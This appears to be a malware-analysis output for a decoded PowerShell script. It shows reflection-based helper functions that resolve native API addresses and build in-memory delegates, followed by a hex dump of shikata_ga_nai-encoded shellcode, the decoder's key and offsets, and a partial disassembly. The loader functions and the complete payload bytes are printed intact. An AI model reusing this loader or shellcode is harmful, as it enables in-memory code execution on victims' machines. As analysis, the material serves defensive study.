decoded

1. function oNA2W {
2. Param ($zXHxk, $wyqxq)
3. $k5 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
4.  
5. return $k5.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($k5.GetMethod('GetModuleHandle')).Invoke($null, @($zXHxk)))), $wyqxq))
6. }
7.  
8. function wvc {
9. Param (
10. [Parameter(Position = 0, Mandatory = $True)] [Type[]] $kj,
11. [Parameter(Position = 1)] [Type] $s7F9X = [Void]
12. )
13.  
14. $eMCG0 = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
15. $eMCG0.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $kj).SetImplementationFlags('Runtime, Managed')
16. $eMCG0.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $s7F9X, $kj).SetImplementationFlags('Runtime, Managed')
17.  
18. return $eMCG0.CreateType()
19. }
20.  
21. ~~~
22. Hex dump: d9 cc ba 6d ea ee f8 d9 74 24 f4 58 29 c9 b1 63 31 50 1a 03 50 1a 83 c0 04 e2 f5 b8 c2 58 fa 3f db da d9 74 24 f4 5b 29 c9 b1 5d 83 c3 04 31 43 0e 03 81 56 18 ca dc a5 05 41 fa dd ee 10 98 af 36 cb b5 06 f9 45 46 58 fe 58 18 4d fc ca 16 3e ce b9 60 d0 e1 96 fa a4 44 a6 a5 ff 6a 2c 3e f9 01 1d 5b ea d1 d8 f3 72 f6 90 1a 5d fb 09 86 a2 8d ef ae fa da f4 ef 93 a3 b0 89 5f e8 2d 6a fa e9 da a0 2c cf f8 ce 26 0a 2a 10 3f 00 92 f9 60 7c 72 bb b9 66 f1 64 dc d5 ff b1 8e 18 d8 a7 ea 88 fd 6c a2 bd 9c 19 e6 a6 fb 55 e9 45 a3 96 dd 5d 2f 0b 9d 14 68 c9 8d 64 54 65 97 6f f1 19 fb 5f 02 69 56 8e ca 70 74 9b 16 c0 73 57 cc ea 23 10 6b 63 d6 0c b9 bc 88 11 cd 95 bc c6 e2 be 71 f1 a1 55 6e a2 92 c0 79 20 29 46 86 a9 f3 80 16 d1 17 ca 51 95 60 24 73 77 37 95 52 f5 2a 6e bd 1c 82 e1 ef df c3 a6 ba 10 0f 86 f6 72 0a b6 c7 70 80 f6 79 9d b7 39 97 6e 32 df ef c8 a7 2d 10 49 b7 8e 64 88 a7 7a 8a b4 c3 04 69 b8 0f f3 64 3e 54 f0 62 47 42 05 e3 45 2e 4d db 49 cb 0f c3 4d 24 9e ec b2 38 03 77 85 59 c8 7b dd 96 c5 7f 4c a8 d2 13 46 5b bc 62 7f b0 f1 77 0c 07 ae 8f 0b 20 f5 4e 7b 37 43 94 70 d7 e3 4f aa d0 d3 4b 0e 08 a3 da ed 73 1b 67 7f b2 b3 0d d9 a5 e3 21 d5 34 32 48 e2 75 fb 5a 40 11 63 15 53 6d
23. Found shikata_ga_nai shellcode len = 99, key = 0x6e916add, decode offset= 26, fpop offset = 0, keyop= add, istart=0x13, 'add edx,dword [eax + 26]'
24. 0x00000000 d9cc fxch st0,st4
25. 0x00000002 ba6deaeef8 mov edx,0xf8eeea6d
26. 0x00000007 d97424f4 fnstenv [esp - 12]
27. 0x0000000b 58 pop eax
28. 0x0000000c 29c9 sub ecx,ecx
29. 0x0000000e b163 mov cl,99
30. 0x00000010 31501a xor dword [eax + 26],edx
31. 0x00000013 03501a add edx,dword [eax + 26]
32. 0x00000016 83c004 add eax,4
33. 0x00000019 e2f5 loop 0x00000010
34. 0x0000001b b8c258fa3f mov eax,0x3ffa58c2--> '?X'
35. 0x00000020 dbda fcmovnu st0,st2
36. 0x00000022 d97424f4 fnstenv [esp - 12]
37. 0x00000026 5b pop ebx
38. 0x00000027 29c9 sub ecx,ecx
39. 0x00000029 b15d mov cl,93
40. 0x0000002b 83c304 add ebx,4
41. 0x0000002e 31430e xor dword [ebx + 14],eax
42. 0x00000031 03815618cadc add eax,dword [ecx - 590735274]
43. 0x00000037 a5 movsd
44. 0x00000038 0541faddee add eax,0xeeddfa41
45. 0x0000003d 1098af36cbb5 adc byte [eax - 1244973393],bl
46. 0x00000043 06 push es
47. 0x00000044 f9 stc
48. 0x00000045 45 inc ebp
49. 0x00000046 46 inc esi
50. 0x00000047 58 pop eax
51.  
52. Byte Dump:
53. ...m....t$.X)..c1P..P........X.?...t$.[)..]...1C...V.....A......6....EFX.X.M...>..`.....D...j,>...[....r...].............._.-j....,...&*.?...`|r..f.d...........l.......U.E...]/..h..dTe.o..._.iV..pt...sW..#.kc...........q..Un...y)F........Q.`$sw7.R.*n.............r..p..y..9.n2....-.I..d..z....i...d>T.bGB..E.M.I...M$...8.w.Y.{....L...F[.b...w....N{7C.p..O...K.....s.g......!.42H.u.Z@.c.Sm